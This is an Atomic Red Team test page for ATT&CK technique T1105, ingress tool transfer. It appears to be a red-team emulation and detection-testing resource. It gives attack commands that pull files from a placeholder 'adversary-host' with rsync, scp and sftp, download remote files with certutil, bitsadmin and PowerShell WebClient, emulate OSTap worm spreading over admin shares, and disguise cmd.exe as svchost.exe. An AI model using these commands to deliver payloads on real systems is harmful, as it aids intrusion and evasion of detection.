Skip to content

T1105.md

Latest commit

 

History

History
419 lines (213 loc) · 10.2 KB

T1105.md

File metadata and controls

419 lines (213 loc) · 10.2 KB

T1105 - Ingress Tool Transfer

Description from ATT&CK

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.

Atomic Tests


Atomic Test #1 - rsync remote file copy (push)

Utilize rsync to perform a remote file copy (push)

Supported Platforms: Linux, macOS

Inputs:

Name Description Type Default Value
remote_path Remote path to receive rsync Path /tmp/victim-files
remote_host Remote host to copy toward String victim-host
local_path Path of folder to copy Path /tmp/adversary-rsync/
username User account to authenticate on remote host String victim

Attack Commands: Run with bash!

rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}


Atomic Test #2 - rsync remote file copy (pull)

Utilize rsync to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

Inputs:

Name Description Type Default Value
remote_path Path of folder to copy Path /tmp/adversary-rsync/
remote_host Remote host to copy from String adversary-host
local_path Local path to receive rsync Path /tmp/victim-files
username User account to authenticate on remote host String adversary

Attack Commands: Run with bash!

rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}


Atomic Test #3 - scp remote file copy (push)

Utilize scp to perform a remote file copy (push)

Supported Platforms: Linux, macOS

Inputs:

Name Description Type Default Value
remote_path Remote path to receive scp Path /tmp/victim-files/
local_file Path of file to copy Path /tmp/adversary-scp
remote_host Remote host to copy toward String victim-host
username User account to authenticate on remote host String victim

Attack Commands: Run with bash!

scp #{local_file} #{username}@#{remote_host}:#{remote_path}


Atomic Test #4 - scp remote file copy (pull)

Utilize scp to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

Inputs:

Name Description Type Default Value
remote_host Remote host to copy from String adversary-host
local_path Local path to receive scp Path /tmp/victim-files/
remote_file Path of file to copy Path /tmp/adversary-scp
username User account to authenticate on remote host String adversary

Attack Commands: Run with bash!

scp #{username}@#{remote_host}:#{remote_file} #{local_path}


Atomic Test #5 - sftp remote file copy (push)

Utilize sftp to perform a remote file copy (push)

Supported Platforms: Linux, macOS

Inputs:

Name Description Type Default Value
remote_path Remote path to receive sftp Path /tmp/victim-files/
local_file Path of file to copy Path /tmp/adversary-sftp
remote_host Remote host to copy toward String victim-host
username User account to authenticate on remote host String victim

Attack Commands: Run with bash!

sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'


Atomic Test #6 - sftp remote file copy (pull)

Utilize sftp to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

Inputs:

Name Description Type Default Value
remote_host Remote host to copy from String adversary-host
local_path Local path to receive sftp Path /tmp/victim-files/
remote_file Path of file to copy Path /tmp/adversary-sftp
username User account to authenticate on remote host String adversary

Attack Commands: Run with bash!

sftp #{username}@#{remote_host}:#{remote_file} #{local_path}


Atomic Test #7 - certutil download (urlcache)

Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
remote_file URL of file to copy Url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path Local path to place file Path Atomic-license.txt

Attack Commands: Run with command_prompt!

cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}


Atomic Test #8 - certutil download (verifyctl)

Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
remote_file URL of file to copy Url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path Local path to place file Path Atomic-license.txt

Attack Commands: Run with powershell!

$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }


Atomic Test #9 - Windows - BITSAdmin BITS Download

This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
bits_job_name Name of the created BITS job String qcxjb7
local_path Local path to place file Path Atomic-license.txt
remote_file URL of file to copy Url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt

Attack Commands: Run with command_prompt!

C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}


Atomic Test #10 - Windows - PowerShell Download

This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
remote_file URL of file to copy Url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
destination_path Destination path to file Path $env:TEMP\Atomic-license.txt

Attack Commands: Run with powershell!

(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")

Cleanup Commands:

Remove-Item #{destination_path} -Force -ErrorAction Ignore


Atomic Test #11 - OSTAP Worming Activity

OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
destination_path Path to create remote file at. Default is local admin share. String \\localhost\C$

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd


Atomic Test #12 - svchost writing a file to a UNC path

svchost.exe writing a non-Microsoft Office file to a file with a UNC path. Upon successful execution, this will rename cmd.exe as svchost.exe and move it to c:\, then execute svchost.exe with output to a txt file.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt

Cleanup Commands:

del C:\T1105.txt >nul 2>&1
del C:\\svchost.exe >nul 2>&1